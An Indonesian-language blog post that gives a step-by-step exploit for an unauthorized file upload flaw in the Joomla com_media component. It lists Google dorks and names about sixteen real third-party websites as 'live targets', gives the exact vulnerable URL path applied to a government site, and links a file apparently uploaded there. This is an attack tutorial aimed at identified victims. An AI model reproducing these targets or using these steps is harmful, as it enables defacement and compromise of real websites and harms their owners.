×

Exploit Joomla: Com_Media

Assalamualaikum 

Hello Akang Sekarang Saya Mau Share Ilmu Sedikit Doang seh hehehehe :D kalo mau sih udah lama tapi banyak sibuknya bro :D ..Kelihatan nya sih bro" udah banyak yang tau tapi saya sih share doang :


 # Exploit Title: Com_Media (CMS JOOMLA)
# Date: 12-05-2013
# Author: SultanHaikal
# Version: 2.5
# Tested on: Windows Xp & Linux 
# Dork: inurl:com_media dan site:.com inurl:com_media kembangin lagi bro :P jangan mau enaknya aja

Pertama Serach google dork nya :D
Biar ga susah" gua kasih live target nya aja deh :D
www.ayrshirebridge.co.uk
www.magicrete.in 
www.unitedwaypeel.org
www.cvbhejo.com
rockbandschoolofmusic.com
www.adriennejfurness.com
www.one-world-volunteer.net
hiddenneedle.com
www.wartakutim.com
permaculture.com.au/campus
arsomsilp.ac.th/health
www.skylinepark.org
www.gorillareisen.de
www.moclinejo.de
www.sv-mistelgau.de
www.ablogic.de

dan masih banyak lagi kang neh langsung aja ke TKP :

http://houseconmin.gov.lk
nah ane pake live target web yang di atas ini coba lu tambahiin ini 
/index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_
articletext&asset=com_content&author=&folder=

jadi seperti ini  
http://houseconmin.gov.lk/index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_
articletext&asset=com_content&author=&folder=

ss:



 Click Browse neh ini vuln nya file berbentuk : .txt .jpg .gif .png kalo .php dan html kayanya ngga work bro :D tapi misalnnya agan" bisa ya bagus lah di kembangin

jika bro sudah click browse nah pilih lah file anda :D contoh ss :)



nah saya browse file saya yang berbentuk .txt bernama x.txt 
lalu lu click Start upload tunggu sebentar dan selesai.

Jika ingin mengecek file kita tinggal tambahkan /images/filekita.txt
done http://houseconmin.gov.lk/images/isd.txt

Semoga artikel ini bermanfaat ^_^

Wassalamualaikum

0 komentar:

Posting Komentar